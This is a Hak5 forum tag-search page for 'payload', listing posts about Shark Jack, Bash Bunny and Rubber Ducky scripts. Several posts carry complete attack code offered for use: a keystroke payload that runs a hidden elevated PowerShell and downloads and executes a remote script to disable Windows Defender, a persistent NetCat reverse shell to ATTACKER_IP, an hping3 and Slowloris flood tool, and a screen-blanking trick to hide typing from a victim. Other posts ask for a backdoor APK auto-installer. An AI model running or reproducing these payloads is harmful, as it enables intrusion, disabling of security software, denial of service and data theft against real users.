Jump to content

Search the Community

Showing results for tags 'payload'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • WiFi Pineapple
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Gear
    • Hak5 Cloud C²
    • Plunder Bug
    • Bash Bunny
    • Signal Owl
    • USB Rubber Ducky
    • Packet Squirrel
    • LAN Turtle
    • Screen Crab
    • Shark Jack
    • Key Croc
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests


Enter a five letter word.

Found 55 results

  1. GIve-Me-My-iP (GIMMP) This payload is used to force the SharkJack on to Static LAN's. Main Scenario - DHCP is disabled or not present on the LAN, only Static IP Devices. The Payload uses ARP-Scan to scan a Array of Subnets to determine if ANY devices are on those subnets. - If so connect to the last known network with devices and set the IP of the SharkJack to the Subnet and Last Digits you assign in the payload. Enjoy. NOTE: This payload requires the Router/LAN to have ARP Scanning enabled. Some Routers/LAN's do not have this feature enabled. The Code: #!/bin/bash # # Title: GIve-Me-My-iP! (GIMMP) # Author: REDD of Private-Locker # Version: 1.0 # # Description: This payload will determine if DHCP is enabled # on the LAN. - If not, it will scan a List of Common Network # Subnets for any Static IP Devices using ARP-scan. Once a valid # IP is found. It will set the SharkJack to the subnet of the last # detected Network in the log file with the ending IP digits. # # LED SETUP (Magenta) - Setting up Variables and enviroment # LED Yellow thru Magenta - Waiting to be plugged in # LED Cyan thru Magenta - Scanning Subnets for Static IP Devices # LED Green Blinking - DHCP found # LED Green SOLID - IP Address found and set to SharkJack # LED Red SOLID - Payload failed, No IP addresses detected # LED FINISH (Green) - Payload completed # # Ending IP digits of the SharkJack. SET_IP="250" # Source IP that the ARP-Scan will come from. FAKE_SRC="192.168.133.7" # Packet Rate for ARP-Scan. BANDWIDTH="100000" # Temp log file for output of script. TMP_LOG="temp.log" # Determine if SharkJack gets IP. while ! ifconfig eth0; do LED M SOLID;sleep .8;LED Y SOLID;sleep .2; done NETMODE DHCP_CLIENT; LED M SOLID; sleep 5; IP="$(ip route list dev eth0 | awk ' /^default/ {print $3}')" # Verify variable to compare SharkJack IP. VERIFY="^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$" function cleanup() { if [ -f "$TMP_LOG" ]; then rm -rf $TMP_LOG; fi } function scan_networks() { NETWORKS=( '192.168.0.0/24' '192.168.1.0/24' '192.168.2.0/24' '192.168.10.0/24' '192.168.100.0/24' '172.16.0.0/24' '172.16.1.0/24' '172.16.2.0/24' '172.16.10.0/24' '172.16.24.0/24' '10.0.0.0/24' '10.0.1.0/24' '10.0.2.0/24' '10.0.10.0/24' '10.10.0.0/24' '10.10.1.0/24' '10.10.2.0/24' '10.10.10.0/24' '10.100.0.0/24' '10.100.1.0/24' '10.100.2.0/24' '10.100.10.0/24' ) for i in "${NETWORKS[@]}"; do LED M SOLID; arp-scan --arpspa $FAKE_SRC -g -B $BANDWIDTH -I eth0 ${i} >> $TMP_LOG LED Y SOLID; sleep .2; done LED M FAST; LAST_IP=$(grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}" $TMP_LOG | tail -1 | cut -d"." -f1-3) if [ "$LAST_IP" != "" ]; then SHARKJACK_IP="${LASTIP}.${SET_IP}" ifconfig eth0 ${SHARKJACK_IP}/24 up CURRENT_SUBNET="${LAST_IP}" CURRENT_GW=$(ip route list dev eth0 | awk ' /^default/ {print $3}') LED G SOLID; else # If no LAN detected, exit. LED R SOLID; exit 1; fi } # Start the script. If Valid IP, continue script. - If not lets scan some networks! if [ -f "$TMP_LOG" ]; then rm -rf $TMP_LOG; else touch $TMP_LOG; fi if [[ "$IP" =~ $VERIFY ]]; then # Gateway found. Continuing script. LED G FAST; sleep 1; elif [ -z "$IP" ]; then # No Gateway found (Blank Gateway Variable) NETMODE TRANSPARENT; scan_networks; elif [ "$IP" == "172.16.24.1" ]; then # Added to detect if the SharkJack remains on the current Arming Mode IP. NETMODE TRANSPARENT; scan_networks; else # Exiting with exit code 1. LED R SOLID; exit 1; fi # Final Cleanup. cleanup; # Run your SCAN's here.. OR ... if you have Internet Tester Payload backed up in SharkLib LED FINISH SHARKLIB="/root/payload/sharklib" PAYLOAD="${SHARKLIB}/'Internet Tester'/payload.sh" if [ -d "$SHARKLIB" ]; then source $PAYLOAD; fi Changelog: 1.1 - Initial Release
  2. REDD

    [TOOL] SharkLib

    SharkLib - SharkJack Quick Payload Library This Tool was created less than 24 hours after having a "SharkJack", I realized how much of a pain it is to swap back and forth between prior loaded Payloads. So after 7 hours of debugging, testing, and pulling my hair out. - I give to you "SharkLib". SharkLib allows you to Backup/Restore prior loaded Payloads, via SSH Terminal. No more needing to have to "go deploy another script", you can easily use C2 or any SSH Terminal Service to switch your desired payloads. Features: Installs to Local System to allow ease of access of "SharkLib". (/usr/sbin) Syncs on Exit to prevent data corruption in payloads. Easy to use Menu Interface. Switch payloads in seconds with SSH. I will post the Code in here, until Hak5 tells me what "category" this tool falls under in the GitHub Repo. The Code: #!/bin/bash # # Title: SharkLib # Author: REDD of Private-Locker # Version: 1.3 # # This Script is to be ran on the Hak5 SharkJack itself. This Script # makes switching between local stored payloads quick and simple. # VERS=1.3 LIB_DIR="/root/payload/sharklib" DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" >/dev/null 2>&1 && pwd )" START_DIR="$DIR" INSTALL_DIR="/usr/sbin" EXEC_FILE="sharklib" PAYLOAD_DIR="/root/payload" PAYLOAD_FILE="$PAYLOAD_DIR/payload.sh" function install_sharklib() { if [[ "$DIR" != $INSTALL_DIR ]]; then if [ ! -f "$INSTALL_DIR/$EXEC_FILE" ]; then printf " -> Installing SharkLib into System for Easy Access.\n" sleep 1; cp -rf $0 $INSTALL_DIR/$EXEC_FILE printf " -> Fixing Permissions of $EXEC_FILE in $INSTALL_DIR.\n" sleep 1; chmod +x $INSTALL_DIR/$EXEC_FILE fi fi } function view_payload() { printf "\n"; cat "$PAYLOAD_FILE"; printf "\n"; read -n 1 -s -r -p "Press any key to return to Menu.."; sharklib_menu; } function remove_sharklib() { if [ -f "$INSTALL_DIR/$EXEC_FILE" ]; then printf "\n" printf "Removing SharkLib from local system.\n" rm -rf "$INSTALL_DIR/$EXEC_FILE"; printf "Removing SharkLib Payload Library.\n" rm -rf "$LIB_DIR"; printf "SharkLib has been fully removed.\n\n" fi } function free_space() { FREE_MEM="$(df -h $PWD | awk '/[0-9]%/{print $(NF-2)}')" } function header() { free_space; printf "\n" printf "O========================================O\n" printf "| SharkLib - SharkJack Quick Payload |\n" printf "| Library |\n" printf "O=O====================================O=O\n" printf " | %-29s |\n" "$SHARKLIB_TITLE" printf " O====================================O\n" printf " | Free Space: %-6s Vers: %-3s | \n" "$FREE_MEM" "$VERS" printf " O================================O \n" printf " -Huge Thanks goes to Hak5! \n" printf "\n" } function backup_payload() { clear; SHARKLIB_TITLE=" Backup Payloads" header; if [ -f "$PAYLOAD_FILE" ]; then printf "\n" printf " 1. Backup current payload to SharkLib\n" printf "\n" printf " 2. Return to Previous Menu.\n" printf "\n" printf " Select a Menu Item by # and press ENTER: " read BACKUP_INPUT printf "\n" if [ "$BACKUP_INPUT" = "1" ]; then printf " What would you want to call this Payload?: " read BACKUP_INPUT_1 if [[ "$BACKUP_INPUT_1" != "" ]]; then if [ ! -d "$LIB_DIR/$BACKUP_INPUT_1" ]; then mkdir -p "$LIB_DIR/$BACKUP_INPUT_1" cp -rf "$PAYLOAD_FILE" "$LIB_DIR/$BACKUP_INPUT_1/payload.sh" printf " Created Payload directory named $BACKUP_INPUT_1\n" sleep 2; sharklib_menu; else printf " Removing Old Copy and using New Copy of $BACKUP_INPUT_1\n" rm -rf "$LIB_DIR/$BACKUP_INPUT_1" mkdir -p "$LIB_DIR/$BACKUP_INPUT_1" cp -rf "$PAYLOAD_FILE" "$LIB_DIR/$BACKUP_INPUT_1/payload.sh" sleep 2; sharklib_menu; fi else if [ ! -d "$LIB_DIR/Payload" ]; then printf " Backing up Payload into Default Payload directory..\n" mkdir -p "$LIB_DIR/Payload" cp -rf "$PAYLOAD_FILE" "$LIB_DIR/Payload/payload.sh" sleep 2; sharklib_menu; else printf " Removing Old Copy and using New Copy of $LIB_DIR/Payload\n" rm -rf "$LIB_DIR/Payload" mkdir -p "$LIB_DIR/Payload" cp -rf "$PAYLOAD_FILE" "$LIB_DIR/Payload/payload.sh" sleep 2; sharklib_menu; fi fi elif [ "$BACKUP_INPUT" = "2" ]; then sharklib_menu; else backup_payload; fi else printf " No Payload in $PAYLOAD_DIR.\n" fi } function delete_payload() { DELETE_INPUT=NULL clear; SHARKLIB_TITLE=" Delete Payloads" header; cd "$LIB_DIR" DIR_CNT="NULL" DIR_CNT=$(ls "$LIB_DIR" | grep -v total | wc -l) declare -a DIRS i=1 for d in */; do DIRS[i++]="${d%/}" done if [ "$DIR_CNT" -lt "1" ]; then printf " There are no Payloads to Delete. \n\n" printf " Returning to Previous Menu.\n" sleep 2; sharklib_menu; fi printf " There are ${#DIRS[@]} Payloads in SharkLib:\n" for((i=1;i<=${#DIRS[@]};i++)); do printf " %2d. %-20s\n" "$i" "${DIRS[i]}" done PAYLOAD_TOTAL=${#DIRS[@]} PLUS_QUIT=$((PAYLOAD_TOTAL+1)) printf "\n" printf " %2d. %-20s\n" "$PLUS_QUIT" "Return to Previous Menu." printf "\n" printf " Please choose a Payload by Number: " read DELETE_INPUT printf "\n" if [[ "$DELETE_INPUT" == "$PLUS_QUIT" ]]; then printf " Returning to Previous Menu.\n" sleep 2; sharklib_menu; elif [[ "$DELETE_INPUT" == "" ]]; then printf " Please Input a choice.\n" sleep 2; delete_payload; elif ! [[ "$DELETE_INPUT" =~ ^[0-9]+$ ]]; then printf " Please Input a choice.\n" sleep 2; delete_payload; elif [[ "$DELETE_INPUT" == "0" ]]; then printf " Please Input a choice.\n" sleep 2; delete_payload; elif [[ "$DELETE_INPUT" -gt "$PLUS_QUIT" ]]; then printf " Please Input a choice.\n" sleep 2; delete_payload; elif [[ "$DELETE_INPUT" -le "$PLUS_QUIT" ]]; then printf " Deleting payload ${DIRS[$DELETE_INPUT]} from SharkJack. \n" rm -rf "$LIB_DIR/${DIRS[$DELETE_INPUT]}" cd "$START_DIR" sleep 2; sharklib_menu; else printf " Wrong Choice, going back to Previous Menu.\n" cd "$START_DIR" sleep 2; sharklib_menu; fi } function restore_payload() { LOAD_INPUT=NULL clear; SHARKLIB_TITLE=" Restore Payloads" header; cd "$LIB_DIR" DIR_CNT=$(ls "$LIB_DIR" | grep -v total | wc -l) declare -a DIRS i=1 for d in */; do DIRS[i++]="${d%/}" done if [ "$DIR_CNT" -lt "1" ]; then printf " There are no Payloads to Restore. \n\n" printf " Returning to Previous Menu.\n" sleep 2; sharklib_menu; fi printf " There are ${#DIRS[@]} Payloads in SharkLib:\n" for((i=1;i<=${#DIRS[@]};i++)); do printf " %2d. %-20s\n" "$i" "${DIRS[i]}" done PAYLOAD_TOTAL=${#DIRS[@]} PLUS_QUIT=$((PAYLOAD_TOTAL+1)) printf "\n" printf " %2d. %-20s\n" "$PLUS_QUIT" "Return to Previous Menu." printf "\n" printf " Please choose a Payload by Number: " read LOAD_INPUT printf "\n" if [[ "$LOAD_INPUT" == "$PLUS_QUIT" ]]; then printf " Returning to Previous Menu.\n" sleep 2; sharklib_menu; elif [[ "$LOAD_INPUT" == "" ]]; then printf " Please Input a choice.\n" sleep 2; restore_payload; elif ! [[ "$LOAD_INPUT" =~ ^[0-9]+$ ]]; then printf " Please Input a choice.\n" sleep 2; restore_payload; elif [[ "$LOAD_INPUT" == "0" ]]; then printf " Please Input a choice.\n" sleep 2; restore_payload; elif [[ "$LOAD_INPUT" -gt "$PLUS_QUIT" ]]; then printf " Please Input a choice.\n" sleep 2; restore_payload; elif [[ "$LOAD_INPUT" -le "$PLUS_QUIT" ]]; then printf " Loading payload ${DIRS[$LOAD_INPUT]} to SharkJack. \n" cp -rf "$LIB_DIR/${DIRS[$LOAD_INPUT]}/payload.sh" "$PAYLOAD_FILE" cd "$START_DIR" sleep 2; sharklib_menu; else printf " Wrong Choice, going back to Previous Menu.\n" cd "$START_DIR" sleep 2; sharklib_menu; fi } function cleanup_ctrl { echo -en "\n -> Caught SIGINT! \n" printf " -> Cleaning up and Exiting..\n\n" sync sleep 1; exit $? } function exit_sharklib() { printf " -> Cleaning up and Exiting..\n\n" sync sleep 1; exit 0; } function sharklib_menu() { clear; trap cleanup_ctrl SIGINT trap cleanup_ctrl SIGTERM MENU_INPUT=NULL if [ ! -d "$LIB_DIR" ]; then printf " -> Creating SharkLib Payload Library directory.\n" mkdir -p "$LIB_DIR" fi cd "$LIB_DIR" SHARKLIB_TITLE=" By REDD" header; printf " 1. Backup Payload to SharkLib\n" printf " 2. Restore Payload from SharkLib\n" printf " 3. Delete Payload from SharkLib\n" printf "\n" printf " 4. View Current Payload on SharkJack\n" printf "\n" printf " 5. Exit\n" printf "\n" printf " Select a Menu Item by # and press ENTER: " read MENU_INPUT printf "\n" if ! [[ "$MENU_INPUT" =~ ^[0-9]+$ ]]; then sharklib_menu; elif [[ "$MENU_INPUT" = "0" ]]; then sharklib_menu; elif [[ "$MENU_INPUT" = "1" ]]; then backup_payload; elif [[ "$MENU_INPUT" = "2" ]]; then restore_payload; elif [[ "$MENU_INPUT" = "3" ]]; then delete_payload; elif [[ "$MENU_INPUT" = "4" ]]; then view_payload; elif [[ "$MENU_INPUT" = "5" ]]; then exit_sharklib; elif [[ "$MENU_INPUT" -ge "6" ]]; then sharklib_menu; elif [[ "$MENU_INPUT" == "" ]]; then sharklib_menu; else sharklib_menu; fi } if [ "$1" == "--install" ]; then install_sharklib; exit 0; elif [ "$1" == "--remove" ]; then remove_sharklib; else install_sharklib; sharklib_menu; fi Suggestions are always welcome! Huge Thanks to Hak5 for the wonderful gear! REDD (Ar1k88)
  3. Nmap Quickscan (Cleaned & C2 Enabled) This is a cleaned up output version of the Original Nmap Scan that Hak5 introduces us to. The Payload waits for "Internet Connection" to be present. Once Internet Connection is found, It scans the local subnet for any online devices. - While also logging the Public IP of the Victim's Network (Very useful when you are scanning multiple networks in a short amount of time.) payload.sh #!/bin/bash # Title: Nmap Quickscan (Cleaned & C2 Enabled) # Author: REDD of Private-Locker # Version: 1.0 # # This is a cleaned up output version of the Original Nmap Scan that Hak5 introduces us to. # The Payload waits for "Internet Connection" to be present. Once Internet Connection is found, # It scans the local subnet for any online devices. - While also logging the Public IP of the # Victim's Network (Very useful when you are scanning multiple networks in a short amount of time.) # # Magenta w/ Yellow ........Waiting for Internet # Yellow flashing...........Scanning # Blue......................Exfiltrating to C2 # Red.......................Failed C2/EXFIL/Scanning # Green.....................Finished if [ -f "/etc/device.config" ]; then INITIALIZED=1 else INITIALIZED=0 fi LED SETUP NETMODE DHCP_CLIENT while ! ifconfig eth0 | grep "inet addr"; do LED Y SOLID; sleep .2; LED M SOLID; sleep .8; done URL="http://www.google.com" while ! wget $URL -qO /dev/null; do sleep 1; done GET_GATEWAY=$(route -n | grep 'UG[ \t]' | awk '{print $2}') while [ $GET_GATEWAY == "" ]; do sleep 1; done INTERNAL_IP=$(ifconfig | sed -En 's/127.0.0.1//;s/.*inet (addr:)?(([0-9]*\.){3}[0-9]*).*/\2/p') SUBNET=$(echo "$GET_GATEWAY" | awk -F"." '{print $1"."$2"."$3".0/24"}') CHK_SUB=$(echo $INTERNAL_IP | cut -d"." -f1-3) FIN_SUB="${CHK_SUB}.0/24" LED ATTACK; if [ "$SUBNET" != "$FIN_SUB" ]; then LED R FAST; sleep 2; LED R SOLID; else if [ ! -d "$LOOT_DIR" ]; then mkdir -p "$LOOT_DIR" fi if [ ! -f "$LOOT_FILE" ]; then touch "$LOOT_FILE" fi # Fix for Timestamp Update ntpd -gq; sleep 1; DATE_FORMAT=$(date '+%m-%d-%Y_%H:%M:%S') LOOT_DIR="/root/loot/nmap-diag" LOOT_FILE="$LOOT_DIR/diag-${DATE_FORMAT}.txt" PUBLIC_IP=$(wget -q "http://api.ipify.org" -O -) printf "\n Public IP: ${PUBLIC_IP}\n Online Devices for ${SUBNET}:\n--------------------------------------------\n\n" >> "$LOOT_FILE" nmap -sn --privileged "$SUBNET" --exclude "$INTERNAL_IP" | awk '/Nmap scan report for/{printf " -> ";printf $5;}/MAC Address:/{print " - "substr($0, index($0,$3)) }' >> "$LOOT_FILE" if [ -s "$LOOT_FILE" ]; then if [ "$INITIALIZED" == 1 ]; then if [ -z "$(pgrep cc-client)" ]; then C2CONNECT while ! pgrep cc-client; do LED B SOLID;sleep .2;LED G SOLID;sleep .8; done fi C2EXFIL STRING ${LOOT_FILE} Nmap Diagnostic for Network ${SUBNET} LED B VERYFAST; sleep .5; fi LED FINISH; else LED R SOLID; rm -rf "$LOOT_FILE"; fi fi
  4. Windows Persistent Reverse Shell for Bash Bunny Author: 0dyss3us (KeenanV) Version: 1.0 Description Opens a persistent reverse shell through NetCat on victim's Windows machine and connects it back to host attacker. Targets Windows 10 (working on support for older versions) Connection can be closed and reconnected at any time Deploys in roughly 15-20 sec Works with NetCat Requirements Have a working Bash Bunny :) STATUS LED STATUS Purple Setup Amber (Single Blink) Installing and running scripts Green Finished Installation and Execution Plug in Bash Bunny in arming mode Move files from WindowsPersistentReverseShell to either switch folder Edit the persistence.vbs file and replace ATTACKER_IP with attacker's IP and PORT with whichever port you like to use (I use 1337 ?) Save the persistence.vbs file Unplug Bash Bunny and switch it to the position the payload is loaded on Plug the Bash Bunny into your victim's Windows machine and wait until the final light turns green (about 15-20 sec) Unplug the Bash Bunny and go to attacker's machine Listen on the port you chose in the persistence.vbs file on NetCat Run the command nc -nlvp 1337 (replace the port with the port in persistence.vbs) If using Windows as the attacker machine, you must install Ncat from: http://nmap.org/dist/ncat-portable-5.59BETA1.zip and use the command ncat instead of nc from the directory that you installed ncat.exe. Wait for connection (Should take no longer than 1 minute as the powershell command runs every minute) Once a Windows cmd prompt appears...YOU'RE DONE!! ? and you can disconnect and reconnect at any time as long as the user is logged in Download Click here to download
  5. DisableD3f3nd3r This payload was created out of frustration of people asking how to disable Windows Defender via BashBunny, Rubber-Ducky. I have released payloads for both devices. This is just a basic Powershell "Download String" function to pull from a public Gist/GitHub RAW code (or any other RAW code format). The script will attempt to escalate to Administrator to perform "Disabling Defender". Source Code of the Powershell Script: https://gist.github.com/PrivateLocker/6711c4fe88eae75774284bd6efc377dc The Payload: #!/bin/bash # # Title: Disable D3f3nd3r (Rubber Ducky) # Description: This Payload disables Windows Defender using Powershell, Works also for the Hak5 # Rubber Ducky or any HID device that supports Quacking. # Author: REDD of Private-Locker # Version: 1.0 # Category: Disable Security # Target: Windows # # Source: https://gist.githubusercontent.com/PrivateLocker/6711c4fe88eae75774284bd6efc377dc/raw/30c9a50a3dd9bd2624cdccd1d6325f36dc6849a4/disable.ps1 # Q WIN R Q STRING "powershell -NoP -NonI -W Hidden -Exec Bypass -c \"Start-Process cmd -A '/t:4f'-Verb runAs\"" Q LEFTARROW; Q ENTER; Q STRING "powershell -ExecutionPolicy Bypass -c \"IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/PrivateLocker/6711c4fe88eae75774284bd6efc377dc/raw/30c9a50a3dd9bd2624cdccd1d6325f36dc6849a4/disable.ps1');\"" Q ENTER; sleep 1; Q STRING "exit"; Q ENTER; (Developer's Note - I personally do NOT own a Rubber Ducky. This script has just been adapted to Rubber Ducky format. If any issues, please comment or contact me.)
  6. DisableD3f3nd3r This payload was created out of frustration of people asking how to disable Windows Defender via BashBunny, Rubber-Ducky. I have released payloads for both devices. This is just a basic Powershell "Download String" function to pull from a public Gist/GitHub RAW code (or any other RAW code format). The script will attempt to escalate to Administrator to perform "Disabling Defender". Source Code of the Powershell Script: https://gist.github.com/PrivateLocker/6711c4fe88eae75774284bd6efc377dc The Payload: #!/bin/bash # # Title: Disable D3f3nd3r (BashBunny) # Description: This Payload disables Windows Defender using Powershell, Works also for the Hak5 # Rubber Ducky or any HID device that supports Quacking. # Author: REDD of Private-Locker # Version: 1.0 # Category: Disable Security # Target: Windows # # Source: https://gist.githubusercontent.com/PrivateLocker/6711c4fe88eae75774284bd6efc377dc/raw/30c9a50a3dd9bd2624cdccd1d6325f36dc6849a4/disable.ps1 # LED SETUP ATTACKMODE HID LED ATTACK RUN WIN "powershell -NoP -NonI -W Hidden -Exec Bypass -c \"Start-Process cmd -A '/t:4f'-Verb runAs\"" Q LEFTARROW; Q ENTER; Q STRING "powershell -ExecutionPolicy Bypass -c \"IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/PrivateLocker/6711c4fe88eae75774284bd6efc377dc/raw/30c9a50a3dd9bd2624cdccd1d6325f36dc6849a4/disable.ps1');\"" Q ENTER; sleep 1; Q STRING "exit"; Q ENTER; LED FINISH
  7. Flood Gateway (DDoS) This Payload was created to have a automated way to stress test a Router/Gateway at any given moment. Currently it can use SYN/ACK/RST/UDP/BlackNurse/XMAS and SlowLoris Attacks. This potentially DDoS's the connected Gateway to determine if the Router/Gateway can handle being attacked internally. (And other reasons.... 😉) The Code: #!/bin/bash # # Title: Flood Gateway (DDoS) # Author: REDD of Private-Locker # Version: 1.2 # # Description: This payload detects the Gateway IP then proceeds to # flood the Gateway IP by sending SYN/ACK/RST/UDP Packets or using # SLOWLORIS/BlackNurse/XMAS Attacks. (More options to come) # # Common Ports to Attack: 80 (TCP), 8080(TCP), 53 (UDP), 3389 (TCP), the # rest is up to you. # # Defaults to SYN Attack. # # LED SETUP (Magenta) Setting NETMODE and detecting GW IP. # LED Yellow thru Magenta Waiting Ethernet Plug connection. # LED White thru Magenta Waiting Connection to Public Website. # LED Red Blink No Gateway IP Address, waiting 15 seconds. # LED Red Solid No Gateway IP Address, exiting script. # LED Cyan Blink to Solid Connected to C2. (Optional) # LED Yellow thru Green Attacking Gateway IP with Hping3. # LED Green Solid Attack has Finished. # # NOTE: SLOWLORIS Attack does NOT use the DURATION Variable. It runs until # connections/resources run out. # # BlackNurse Attack does NOT use the PORT Variable. It runs against the # ICMP(Ping) port. # # Type of Attack to perform. ATTACK="SYN" # Port to Attack. PORT="80" # Amount of time you wish to DDoS your Gateway. (Hint: 600 seconds is 10 minutes) DURATION="30" # Turn to YES if you want to connect to C2 BEFORE Attack. C2_CONNECTION="YES" ## Settings for SLOWLORIS Attack. (Only supports HTTP Attack, NOT SSL - HTTPS) HTTP_CONNECTIONS="200" TEST_URL="http://www.google.com" # Start the Script! Man your Stations! LED SETUP; NETMODE DHCP_CLIENT; function net_connect() { while ! ifconfig eth0 | grep "inet addr"; do LED Y SOLID; sleep .2; LED M SOLID; sleep .8; done while ! wget $TEST_URL -qO /dev/null; do LED W SOLID; sleep .2; LED M SOLID; sleep .8; done GATEWAY_IP=$(ip route list dev eth0 | awk ' /^default/ {print $3}') # Detect Gateway IP, if none exit if [ -z $GATEWAY_IP ]; then i=0 for i in {1..15}; do if [ "$i" -le "15" ]; then LED R SOLID; sleep .2; LED OFF;sleep .8; else LED R SOLID; exit 0; fi done fi if [ "$C2_CONNECTION" == "YES" ]; then LED C VERYFAST; C2CONNECT; while ! pgrep cc-client; do LED C FAST;sleep 1; done LED C SOLID; sleep .5; fi } net_connect; # Prepare the Flashy Colors! function led_attack() { LED G SOLID; sleep .2; LED Y SOLID; sleep .8; } function led_attack_dur() { for (( i=1; i<=$DURATION; i++ )); do LED G SOLID; sleep .2; LED Y SOLID; sleep .8; done } # Arm the platoon! function attack() { if [ $ATTACK = "SYN" ]; then led_attack; hping3 --flood -d 4096 --frag --rand-source -p $PORT -S $GATEWAY_IP & HPING_PID=$! led_attack_dur; kill $HPING_PID; fi if [ $ATTACK = "ACK" ]; then led_attack; hping3 --flood -d 4096 --frag --rand-source -p $PORT -A $GATEWAY_IP & HPING_PID=$! led_attack_dur; kill $HPING_PID; fi if [ $ATTACK = "RST" ]; then led_attack; hping3 --flood -d 4096 --frag --rand-source -p $PORT -R $GATEWAY_IP & HPING_PID=$! led_attack_dur; kill $HPING_PID; fi if [ $ATTACK = "UDP" ]; then led_attack; hping3 --flood --udp --sign 4096 -p $PORT $GATEWAY_IP & HPING_PID=$! led_attack_dur; kill $HPING_PID; fi if [ $ATTACK = "BLACKNURSE" ]; then led_attack; hping3 -1 -C 3 -K 3 --flood --rand-source $GATEWAY_IP & HPING_PID=$! led_attack_dur; kill $HPING_PID; fi if [ $ATTACK = "XMAS" ]; then led_attack; hping3 --flood -d 4096 --rand-source -p $PORT -F -S -R -P -A -U -X -Y $GATEWAY_IP & HPING_PID=$! led_attack_dur; kill $HPING_PID; fi if [ $ATTACK = "SLOWLORIS" ]; then led_attack; if [ "$PORT" != "80" ] || [ "$PORT" != "8080" ]; then PORT="80" fi INTERVAL=$((RANDOM % 11 + 5)) i=1 while [ "$i" -le "$HTTP_CONNECTIONS" ]; do # Use Netcat to create a keep-alive connection to the Gateway IP. echo -e "GET / HTTP/1.1\r\nHost: $GATEWAY_IP\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nDNT: 1\r\nConnection: keep-alive\r\nCache-Control: no-cache\r\nPragma: no-cache\r\n$RANDOM: $RANDOM\r\n"|nc -i $INTERVAL -w 30000 $TARGET $PORT 2>/dev/null 1>/dev/null & led_attack; i=$((i + 1)); done fi LED FINISH } # Simple fix for changing arguments to CAPS arg1=$1 ARG_FIX=$( echo "$arg1" | tr '[a-z]' '[A-Z]' ) # Start the Attack! CHHHAAARRRGGGEEE!! if [ "$ARG_FIX" == "ACK" ]; then ATTACK="ACK" attack; elif [ "$ARG_FIX" == "SYN" ]; then ATTACK="SYN" attack; elif [ "$ARG_FIX" == "RST" ]; then ATTACK="RST" attack; elif [ "$ARG_FIX" == "UDP" ]; then ATTACK="UDP" attack; elif [ "$ARG_FIX" == "BLACKNURSE" ]; then ATTACK="BLACKNURSE" attack; elif [ "$ARG_FIX" == "XMAS" ]; then ATTACK="XMAS" attack; elif [ "$ARG_FIX" == "SLOWLORIS" ]; then ATTACK="SLOWLORIS" attack; elif [ -z $1 ]; then # Run ATTACK Variable from beginning of Script. attack; else printf "That is not a correct Packet Attack type.\n\n Supported Types: SYN, ACK, UDP, RST, XMAS, BLACKNURSE and SLOWLORIS\n" exit 1 fi Changelog: 1.2 - - Adds BLACKNURSE/XMAS Attacks to the payload. 1.1 - - Adds UDP/RST/Slowloris Attacks to the payload. 1.0 - Initial Release. Source Code URL: Coming Soon..
  8. Hey guys newbie here, i was wondering if there is a way / payload that if i save a backdoor.apk in the bash it auto installs in android phone? im making a android apk backdoor(rat) and im trying to find a way to make it auto install and run with the bas without internet? if not is there a way with usb rubber ducky? thanks in advance. sorry for my english :/
  9. I Have a few questions about the article "Stealing Files with the USB Rubber Ducky – USB Exfiltration Explained." I would like to know if that code for the payload would work for an OSX system and if it does not work what would be the changes needed for it to work. Also would I have tried to use the same payload for jpgs and photos but it does not seem to work, Is there a way for that to succeed or is it not possible. I would really appreciate it since that is the task I have been given. Thanks
  10. I Have a few questions about the article "Stealing Files with the USB Rubber Ducky – USB Exfiltration Explained." I would like to know if that code for the payload would work for an OSX system and if it does not work what would be the changes needed for it to work. Also would I have tried to use the same payload for jpgs and photos but it does not seem to work, Is there a way for that to succeed or is it not possible. I would really appreciate it since that is the task I have been given. Thanks
  11. Hi, Just wondering if anyone could give me some guidance I work in the security team at a company, I want to roll out a siem agent to developers laptops. I need to install this agent as quickly as possible to linux/mac boxes whilst they are locked or unlocked.(devs dont want to do it themselves are pretty reluctant on handing over their laptops) the agent is basically a bash script install... chmod +x & ./<filename> I think I could use my bashbunny to quickly walk over to the devs laptops, put the usb in... and job done.... So my question is if I run the install via a payload. will it install on the bashbunny OS or the laptop ive plugged it into? or will I have to copy it to the remote OS and use a series of key presses to run it. Any advice would be great. Thanks
  12. One of the problems I had with the ducky is that when typing a script on a target's pc it's really hard if there is a person in front of it. Instead of trying to create the command screen as small as possible so the targets won't see the screen, I've made it so big that they will think the monitor crashed or the cable fell out. The only thing you see now is a black screen and black text so the targets won't see any strings the ducky types. It also doesn't matter if the user clicks on somewhere on the screen with the mouse, because te whole screen is the command line. Here is the payload: REM Make Black Screen DELAY 1000 GUI r DELAY 100 STRING cmd CTRL-SHIFT ENTER DELAY 100 ALT y DELAY 100 STRING mode con: cols=30 lines=1 ALT SPACE UP ENTER DELAY 100 TAB SPACE SHIFT TAB SHIFT TAB STRING 5 SHIFT TAB RIGHT TAB UP TAB TAB TAB SHIFT TAB STRING 0 TAB STRING 0 TAB STRING 0 TAB TAB TAB TAB TAB DOWN DOWN DOWN TAB TAB TAB SHIFT TAB STRING 0 TAB STRING 0 TAB STRING 0 TAB TAB ENTER ALT ENTER REM Black Screen made! REM ***Disable keyboard & mice *** REM ***PAYLOAD**** One problem I had was to disable the targets keyboard (and mouse) so the target can't screw up the script/program the ducky is writing. It is a possibility that the target will freak out and push a lot of keys when they see a black screen. If anyone knows a sollution to this problem, 